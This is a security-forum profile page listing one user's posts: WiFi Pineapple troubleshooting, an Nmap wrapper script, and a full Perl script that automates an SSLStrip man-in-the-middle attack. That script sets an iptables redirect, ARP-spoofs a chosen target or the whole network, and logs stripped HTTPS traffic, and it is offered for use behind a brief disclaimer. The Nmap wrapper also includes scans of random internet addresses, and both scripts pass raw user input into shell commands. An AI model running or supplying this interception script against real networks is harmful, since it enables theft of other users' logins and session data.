Jump to content

cypherround

Active Members
  • Posts

    7
  • Joined

  • Last visited

About cypherround

  • Birthday 08/25/1987

Contact Methods

  • Website URL
    http://www.cypherround.blogspot.com
  • ICQ
    0

Profile Information

  • Gender
    Male

Recent Profile Visitors

887 profile views

cypherround's Achievements

Newbie

Newbie (1/14)

  1. Thank you Digininja! Just as I suspected it was user error. I forgot I had installed apache server like 6 months ago on my laptop. I appreciate the help. I'm certainly in need of a face palm. On the side of the password reset. When you say serial cable do you mean serial -> ethernet? Thanks again Digi, you are a life saver!
  2. I ordered my Pineapple from Hak5 in December and I have finally managed to find some extra time to set it up and get it working. I sat down to get it working today and I am having some major issues. I tried to ssh into it, didn't work. I tried to telnet, it didn't work. I changed its ip address to assure it isn't conflicting with anything else on my network, didn't solve the problem. Lastly, I decided to use the browser to get into the router configuration and I couldn't. I have tried this on multiple different IP's as well and kept getting the same thing. I am including a screen shot of what I get when I try using the web browser, from my understanding should take me to the router configuration. My only thought is that maybe the installation process wasn't finished. I do not want to put blame on anyone what so ever. It is, hopefully, user error on my part but my friend bought a Pineapple from Hak5 as well, his worked and he has been helping me troubleshoot the issue. Neither one of us can figure it out. My hope is someone can help me. Thank you in advanced for any assistance. The screen shot is included with my post. Also, on a side note. Is there a way to reset the Pineapples password without re-flashing it. Friend forgot his password, insert face palm here. lol ~cypherround
  3. I've been using SSLStrip MITM attack a lot recently and decided I am just sick of having to manually configure it so I decided to write a perl script to mostly do it for me or atleast consolidate it in 1 spot. Let me know what you guys think. If anyone notices any bugs let me know so that I can correct them, I've spent the last 2-3hrs testing so it's pretty good from what I can see right now. Nmap option is also included. This is not a tutorial of how to do it, that is posted in another location in the intern0t forums. Here are the things that are required for this script: Linux (tested in Ubuntu & Backtrack 4 R2) Ettercap (specifically etter.conf) X-term (used b/c Ubuntu & BT4 both have it) Arpspoof SSLStrip Nmap **********Start of Disclaimer*********** I'm not responsible for anything illegal or mischievous that you decide to use this for blah, blah, blah... Don't blame me, I didn't force you to use it. **********End of Disclaimer************ #! /usr/bin/perl -w ######################################################################### # Script Created By: # Cypherround # # Man In The Middle Attack # IPtables + Arpspoof + SSLStrip # # http://cypherround.blogspot.com ######################################################################### use strict; use warnings; # open /etc/etter.conf and uncomment # iptables redirect on/off # ctrl+o to save changes # ctrl+x to exit nano and continue with script my $tables; print "########################################\n"; print "You will have to uncomment iptables redirect.\n"; print "Inside nano use ctrl+o to save your changes & ctrl+x to exit and continue the script.\n"; print "Would you like to open /etc/etter.conf to uncomment iptables redirect? (y/n)\n"; $tables=<STDIN>; chomp($tables); if ($tables eq "y"){ print "press ctrl+x to exit nano"; system ("sudo nano /etc/etter.conf"); } # change iptables to allow redirection from port 80 to port 8080 my $redirect; print "########################################\n"; print "Changing iptables to redirect traffic from port 80 to port 8080\n"; $redirect=`sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080`; # check to make sure ip forwarding is enabled my $forward; print "########################################\n"; print "Checking to make sure ip forwarding is enabled\n"; system ("cat /proc/sys/net/ipv4/ip_forward"); print "Does ip forward = 0? (y/n)\n"; $forward=<STDIN>; chomp($forward); if ($forward eq "y"){ system ("sudo nano /proc/sys/net/ipv4/ip_forward"); system ("cat /proc/sys/net/ipv4/ip_forward"); } # check to find out what the default gateway is my $default; print "########################################\n"; system ("netstat -nr"); print "What is the default gateway?\n"; $default=<STDIN>; chomp($default); # check which network interface device my $interface; print "########################################\n"; system ("ifconfig"); print "Which network interface would you like to use?\n"; $interface=<STDIN>; chomp($interface); # check what your ip address is my $ip; print "########################################\n"; system ("ifconfig $interface"); print "What is your IP address?\n"; $ip=<STDIN>; chomp($ip); # option to run nmap scan for a target my $nmap; my $netip; print "########################################\n"; print "Would you like to run an nmap scan of the network to find a target? (y/n)\n"; $nmap=<STDIN>; chomp($nmap); if ($nmap eq "y"){ print "Enter the IP to scan then entire network (ex: 192.168.1.*)\n"; $netip=<STDIN>; chomp($netip); system ("nmap -v -PN $netip"); } # start arpspoof; option to spoof a target or spoof the entire network my $arp; my $target; print "########################################\n"; print "Do you want to spoof a specific target? (y/n)\n"; $arp=<STDIN>; chomp($arp); if ($arp eq "y"){ print "Enter the IP of the Target: \n"; $target=<STDIN>; chomp($target); system ("xterm -e sudo arpspoof -i $interface -t $target $default &"); } else { system ("xterm -e sudo arpspoof -i $interface $default &"); } # start ssl strip my $ssl; my $log; print "########################################\n"; print "Starting SSL Strip.\n"; print "We have a few options for our parameters with SSL Strip.\n"; print "Here are you options: \nsniff all traffic, kill active sessions, log data (akl) \nkill, log, and sniff only https traffic (kl) \nlog https traffic only(l)\n"; $ssl=<STDIN>; chomp($ssl); print "Enter name of the log file, it has to end with '.log'? (ex: strip.log )\n"; $log=<STDIN>; chomp($log); if ($ssl eq "akl"){ system ("xterm -e sudo sslstrip -a -k -l 8080 -w $log &"); } if ($ssl eq "kl"){ system ("xterm -e sudo sslstrip -k -l 8080 -w $log &"); } elsif ($ssl eq "l"){ system ("xterm -e sudo sslstrip -l 8080 -w $log &"); } # start following the sslstrip log using tail my $tail; print "########################################\n"; print "Do you want to start to follow the log file in real time? (y/n)\n"; $tail=<STDIN>; chomp($tail); if ($tail eq "y"){ print "Starting to tail the sslstrip log file.\n"; system ("xterm -e sudo tail -f $log &"); } else { print "Script done. Time to wait.\n"; } Hope this helps everyone, let me know if you have any suggestions. Thanks.
  4. Yes, Mr. Protocol Nmap is simple already but like I said this was just a practice program for calling programs with Perl. I figured I spent a lot of time on it already and has come in quite handy with just making things easier for me, so I wanted to share with the community and hear other peoples responses. Infiltrator, what sort of advanced scans would you like to see? If anyone else would like to see other types of scans let me know and I can incorporate them within the program. Thanks for the comments so far.
  5. Hello everyone, I wrote a Perl script to simplify my Nmap scans. I don't have to add parameters anymore for my most frequently used scans. I wrote a small one a little while back and got feedback on some things to add. I just started scripting with Perl and wanted to learn how to call programs and from there it just progressed into what is now. Yes I know Nmap is already simple but again this was just a practice run for calling programs with Perl. If anyone likes and has feedback on more things to add let me know. #! /usr/bin/perl ################################################################################ ########### # This script was created by cypherround # The purpose of the script is to simplify my favorite nmap scans # without having to input the parameters of the specific scan. # Feel free to use this scan for yourself and if you would like me # to add any other types of scans let me know and I will input them # into the script. Thanks happy hacking! ################################################################################ ########### use strict; use warnings; print "\nScript created by cypherround\n\n"; my @a; #aggressive scan my @ao; #aggressive scan with output to file my @aa; #aggressive scan of all 65535 ports my @aao; #aggressive scan of all 65535 ports with output my @ap; #aggressive scan with specific port my @apo; #aggressive scan with specific port and output my @os; #os fingerprint scan my @oso; #os fingerprint scan with output my @oss; #os fingerprint service scan my @osso; #os fingerprint service scan with output my @osp; #os fingerprint scan with specific port my @ospo; #os fingerprint scan with specific port and output my @osps; #os fingerprint service scan with specific port my @ospso; #os fingerprint service scan with specific port and output my @r; #random IP scan my @ro; #random IP scan with output to file my @ra; #random IP scan of all 65535 ports my @rao; #random IP scan of all 65535 ports with output my @rp; #random IP scan with specific port my @rpo; #random IP scan with specific port and output my @s; #stealth scan my @so; #stealth scan with output to file my @sa; #stealth scan of all 65535 ports my @sao; #stealth scan of all 65535 ports with output my @sp; #stealth scan with specific port my @spo; #stealth scan with specific port and output my @sss; #stealth service scan my @ssso; #stealth service scan with output to file my @sssa; #stealth service scan of all 65535 ports my @sssao; #stealth service scan of all 65535 ports with output my @sssp; #stealth service scan with specific port my @ssspo; #stealth service scan with specific port and output my @u; #udp scan my @uo; #udp scan with output to file my @ua; #udp scan of all 65535 ports my @uao; #udp scan of all 65535 ports with output my @up; #udp scan with specific port my @upo; #udp scan with specific port and output my @ut; #udp & tcp scan my @uto; #udp & tcp scan with output to file my @uta; #udp & tcp scan of all 65535 ports my @utao; #udo & tcp scan of all 65535 ports with output my @utp; #udp & tcp scan with specific port my @utpo; #udp & tcp scan with specific port and output my $ip; #specified ip my $output; #specified output file my $port; #specified port my $random; #specifide amount of random IPs my $scan; #specified type of scan to use print "Here are your options for your nmap scan (enter the abbreviation in parenthesis):\n\n aggressive(a)\n aggresive with output(ao)\n aggressive 65535 ports(aa)\n aggressive 65535 ports with output(aao)\n aggressive with specific port(ap)\n aggressive specific port and output (apo)\n os fingerprint scan(os)\n os fingerprint scan with output(oso)\n os fingerprint service scan(oss)\n os fingerprint service scan with output(osso)\n os fingerprint scan with specific port(osp)\n os fingerprint scan with specific port and output(ospo)\n os fingerprint service scan with specific port(osps)\n os fingerprint scan with specific port and output(ospso)\n random IPsĀ®\n random IPs with output(ro)\n random IPs all 65535 ports(ra)\n random IPs all 65535 ports with output(rao)\n random IPs with specific port(rp)\n random IPs with specific port and output(rpo)\n stealth(s)\n stealth with output(so)\n stealth scan of all 65535 ports(sa)\n stealth scan with all 65535 ports with output(sao)\n stealth scan with specific port(sp)\n stealth scan with specfifi port and output(spo)\n stealth service scan(sss)\n stealth service scan with output(ssso)\n stealth service scan of all 65535 ports(sssao)\n stealth service scan of all 65535 ports with output(sssao)\n stealth service scan with specific port(sssp)\n stealth service scan with specific port and output(ssspo)\n udp(u)\n udp with output(uo)\n udp of all 65535 ports(ua)\n udp of all 65535 ports with output(uao)\n udp with specifc port(up)\n udp with specific port and output(upo)\n udp/tcp(ut)\n udp/tcp with output(uto)\n udp/tcp of all 65535 ports(uta)\n udp/tcp if all 65535 ports with output(utao)\n udp/tcp with specific port(utp)\n udp/tcp with specific port and output(utpo)\n" ; $scan=<STDIN>; chomp($scan); if ($scan eq "r" or $scan eq "ro" or $scan eq "ra" or $scan eq "rao" or $scan eq "rp" or $scan eq "rpo") { print "How many random IPs would you like to scan? \n"; $random=<STDIN>; chomp($random); } elsif ($scan eq "ao" or $scan eq "aao" or $scan eq "apo" or $scan eq "oso" or $scan eq "osso" or $scan eq "ospo" or $scan eq "ospso" or $scan eq "ro" or $scan eq "rao" or $scan eq "rpo" or $scan eq "so" or $scan eq "sao" or $scan eq "spo" or $scan eq "ssso" or $scan eq "sssao" or $scan eq "ssspo" or $scan eq "uo" or $scan eq "uao" or $scan eq "upo" or $scan eq "uto" or $scan eq "utao" or $scan eq "utpo") { print "What would you like your file to be named? add .txt to the filenname (ex: aggressive.txt) \n"; $output=<STDIN>; chomp($output); } elsif ($scan eq "a" or $scan eq "ao" or $scan eq "aa" or $scan eq "aao" or $scan eq "ap" or $scan eq "apo" or $scan eq "os" or $scan eq "oso" or $scan eq "oss" or $scan eq "osso" or $scan eq "osp" or $scan eq "ospo" or $scan eq "osps" or $scan eq "ospso" or $scan eq "s" or $scan eq "so" or $scan eq "sa" or $scan eq "sao" or $scan eq "sp" or $scan eq "spo" or $scan eq "sss" or $scan eq "ssso" or $scan eq "sssa" or $scan eq "sssao" or $scan eq "sssp" or $scan eq "ssspo" or $scan eq "u" or $scan eq "uo" or $scan eq "ua" or $scan eq "uao" or $scan eq "up" or $scan eq "upo" or $scan eq "ut" or $scan eq "uto" or $scan eq "uta" or $scan eq "utao" or $scan eq "utp" or $scan eq "utpo") { print "Enter the IP you are searching for: \n"; $ip=<STDIN>; chomp($ip); } if ($scan eq "ap" or $scan eq "apo" or $scan eq "osp" or $scan eq "ospo" or $scan eq "osps" or $scan eq "ospso" or $scan eq "rp" or $scan eq "rpo" or $scan eq "up" or $scan eq "upo" or $scan eq "utp" or $scan eq "utpo" or $scan eq "sp" or $scan eq "spo" or $scan eq "sssp" or $scan eq "ssspo") { print "Enter the ports you would like to scan: (ex: 21,22,80,443)\n"; $port=<STDIN>; chomp($port); } if ($scan eq "a") { @a = `nmap -v -A $ip`; print "@a\n"; } if ($scan eq "ao") { @ao = `nmap -v -A $ip -oG $output`; print "@ao\n"; } if ($scan eq "aa") { @aa = `nmap -v -A $ip -p-`; print "@aa\n"; } if ($scan eq "aao") { @aao = `nmap -v -A $ip -p- -oG $output`; print "@aao\n"; } if ($scan eq "ap") { @ap = `nmap -v -A $ip -p $port`; print "@ap\n"; } if ($scan eq "apo") { @apo = `nmap -v -A $ip -p $port -oG $output`; print "@apo\n"; } if ($scan eq "os") { @os = `sudo nmap -v -O $ip`; print "@os\n"; } if ($scan eq "oso") { @oso = `sudo nmap -v -O $ip -oG $output`; print "@oso\n"; } if ($scan eq "oss") { @oss = `sudo nmap -v -O -sV $ip`; print "@oss\n"; } if ($scan eq "osso") { @osso = `sudo nmap -v -O -sV $ip -oG $output`; print "@osso\n"; } if ($scan eq "osp") { @osp = `sudo nmap -v -O $ip -p $port`; print "@osp\n"; } if ($scan eq "ospo") { @ospo = `sudo nmap -v -O $ip -p $port -oG $output`; print "@ospo\n"; } if ($scan eq "osps") { @osps = `sudo nmap -v -O -sV $ip -p $port`; print "@osps\n"; } if ($scan eq "ospso") { @ospso = `sudo nmap -v -O -sV $ip -p $port -oG $output`; print "@ospso\n"; } if ($scan eq "r") { @r = `nmap -v -iR $random -PN`; print "@r\n"; } if ($scan eq "ro") { @ro = `nmap -v -iR $random -PN -oG $output`; print "@ro"; } if ($scan eq "ra") { @ra = `nmap -v -iR $random -PN -p-`; print "@ra\n"; } if ($scan eq "rao") { @rao = `nmap -v -iR $random -PN -p- -oG $output`; print "@rao\n"; } if ($scan eq "rp") { @rp = `nmap -v -iR $random -PN -p $port`; print "@rp\n"; } if ($scan eq "rpo") { @rpo = `nmap -v -iR $random -PN -p $port -oG $output`; print "@rpo\n"; } if ($scan eq "s") { @s = `nmap -v -v -PN $ip`; print "@s\n"; } if ($scan eq "so") { @so = `nmap -v -PN $ip -oG $output`; print "@so\n"; } if ($scan eq "sa") { @sa = `nmap -v -PN $ip -p-`; print "@sa\n"; } if ($scan eq "sao") { @sao = `nmap -v -PN $ip -p- -oG $output`; print "@sao\n"; } if ($scan eq "sp") { @sp = `nmap -v -PN $ip -p $port`; print "@sp\n"; } if ($scan eq "spo") { @spo = `nmap -v -PN $ip -p $port -oG $output`; print "@spo\n"; } if ($scan eq "sss") { @sss = `nmap -v -v -sV -PN $ip`; print "@sss\n"; } if ($scan eq "ssso") { @ssso = `nmap -v -sV -PN $ip -oG $output`; print "@ssso\n"; } if ($scan eq "sssa") { @sssa = `nmap -v -sV -PN $ip -p-`; print "@sssa\n"; } if ($scan eq "sssao") { @sssao = `nmap -v -sV -PN $ip -p- -oG $output`; print "@sssao\n"; } if ($scan eq "sssp") { @sssp = `nmap -v -sV -PN $ip -p $port`; print "@sssp\n"; } if ($scan eq "ssspo") { @ssspo = `nmap -v -sV -PN $ip -p $port -oG $output`; print "@ssspo\n"; } if ($scan eq "u") { @u = `sudo nmap -v -sU $ip`; print "@u\n"; } if ($scan eq "uo") { @uo = `sudo nmap -v -sU $ip -oG $output`; print "@uo\n"; } if ($scan eq "ua") { @ua = `sudo nmap -v -sU $ip -p-`; print "@ua\n"; } if ($scan eq "uao") { @uao = `sudo nmap -v -sU $ip -p- -oG $output`; print "@uao\n"; } if ($scan eq "up") { @up = `sudo nmap -v -sU $ip -p $port`; print "@up\n"; } if ($scan eq "upo") { @upo = `sudo nmap -v -sU $ip -p $port -oG $output`; print "@upo\n"; } if ($scan eq "ut") { @ut = `sudo nmap -v -sU -sS $ip`; print "@ut\n"; } if ($scan eq "uto") { @uto = `sudo nmap -v -sU -sS $ip -oG $output`; print "@uto\n"; } if ($scan eq "uta") { @uta = `sudo nmap -v -sU -sS $ip -p-`; print "@uta\n"; } if ($scan eq "utao") { @utao = `sudo nmap -v -sU -sS $ip -p- -oG $output`; print "@utao\n"; } if ($scan eq "utp") { @utp = `sudo nmap -v -sU -sS $ip -p $port`; print "@utp\n"; } if ($scan eq "utpo") { @utpo = `sudo nmap -v -sU -sS $ip -p $port -oG $output`; print "@utpo\n"; } Hope you guys like it.
×
×
  • Create New...